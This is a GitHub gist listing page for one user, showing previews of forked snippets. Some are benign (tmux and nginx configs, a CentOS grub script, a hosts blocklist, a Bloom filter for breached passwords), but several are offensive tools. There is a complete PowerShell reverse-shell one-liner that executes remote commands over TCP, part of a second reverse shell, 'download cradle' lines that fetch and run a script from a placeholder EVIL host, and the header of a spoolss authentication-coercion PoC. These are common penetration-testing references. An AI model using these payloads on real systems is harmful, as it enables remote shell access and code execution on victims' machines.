hagen3000
/ dementor.py
Created
August 23, 2019 23:29
— forked from 3xocyte/dementor.py
rough PoC to connect to spoolss to elicit machine account authentication
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
| # some code from https://www.exploit-db.com/exploits/2879/ | |
| import os | |
| import sys | |
| import argparse | |
| import binascii | |
| import ConfigParser |
hagen3000
/ powershell_reverse_shell.ps1
Created
January 27, 2019 02:20
— forked from egre55/powershell_reverse_shell.ps1
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
| $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
hagen3000
/ bloom.py
Created
January 22, 2019 15:07
— forked from marcan/bloom.py
Simple Bloom filter implementation in Python 3 (for use with the HIBP password list)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # | |
| # Simple Bloom filter implementation in Python 3 | |
| # Copyright 2017 Hector Martin "marcan" <[email protected]> | |
| # Licensed under the terms of the MIT license | |
| # | |
| # Written to be used with the Have I been pwned? password list: | |
| # https://haveibeenpwned.com/passwords | |
| # | |
| # Download the pre-computed filter here (968MB, k=11, false positive p=0.0005): |
hagen3000
/ centos7-grub-console.sh
Created
September 12, 2018 20:12
— forked from goffinet/centos7-grub-console.sh
Centos7 serial console enabled by grub /etc/default/grub, "grub-mkconfig -o /boot/grub/grub.cfg"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| if [ "$(id -u)" != "0" ]; then | |
| echo "This script must be run as root" 1>&2 | |
| exit 1 | |
| fi | |
| cat << EOF > /etc/default/grub | |
| # grub-mkconfig -o /boot/grub/grub.cfg | |
| GRUB_TIMEOUT=5 | |
| GRUB_DISTRIBUTOR="$(sed 's, release .*$,,g' /etc/system-release)" | |
| GRUB_DEFAULT=saved |
hagen3000
/ DownloadCradles.ps1
Created
August 14, 2018 20:29
— forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
hagen3000
/ tmux.conf
Created
May 4, 2018 19:25
— forked from spicycode/tmux.conf
The best and greatest tmux.conf ever
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # 0 is too far from ` ;) | |
| set -g base-index 1 | |
| # Automatically set window title | |
| set-window-option -g automatic-rename on | |
| set-option -g set-titles on | |
| #set -g default-terminal screen-256color | |
| set -g status-keys vi | |
| set -g history-limit 10000 |
hagen3000
/ mini-reverse.ps1
Last active
April 9, 2018 22:09
— forked from staaldraad/mini-reverse.ps1
A reverse shell in Powershell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413); | |
| if($socket -eq $null){exit 1} | |
| $stream = $socket.GetStream(); | |
| $writer = new-object System.IO.StreamWriter($stream); | |
| $buffer = new-object System.Byte[] 1024; | |
| $encoding = new-object System.Text.AsciiEncoding; | |
| do | |
| { | |
| $writer.Flush(); | |
| $read = $null; |
hagen3000
/ nginx.conf
Created
September 13, 2017 18:32
— forked from plentz/nginx.conf
Best nginx configuration for improved security(and performance). Complete blog post here http://tautt.com/best-nginx-configuration-for-security/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # to generate your dhparam.pem file, run in the terminal | |
| openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048 |
hagen3000
/ nginx.conf
Created
September 13, 2017 18:23
— forked from leg0ffant/nginx.conf
Nginx file configuration Wordpress full SSL HSTS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #read more here http://tautt.com/best-nginx-configuration-for-security/ | |
| #don't send the nginx version number in error pages and Server header | |
| server_tokens off; | |
| # config to don't allow the browser to render the page inside an frame or iframe | |
| # and avoid clickjacking | |
| add_header X-Frame-Options SAMEORIGIN; | |
| # when serving user-supplied content, include a X-Content-Type-Options: nosniff header along with the Content-Type: header, |
hagen3000
/ hosts
Created
August 18, 2017 06:05
— forked from consti/hosts
/etc/hosts to block shock sites etc.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This hosts file is brought to you by Dan Pollock and can be found at | |
| # http://someonewhocares.org/hosts/ | |
| # You are free to copy and distribute this file for non-commercial uses, | |
| # as long the original URL and attribution is included. | |
| #<localhost> | |
| 127.0.0.1 localhost | |
| 127.0.0.1 localhost.localdomain | |
| 255.255.255.255 broadcasthost | |
| ::1 localhost |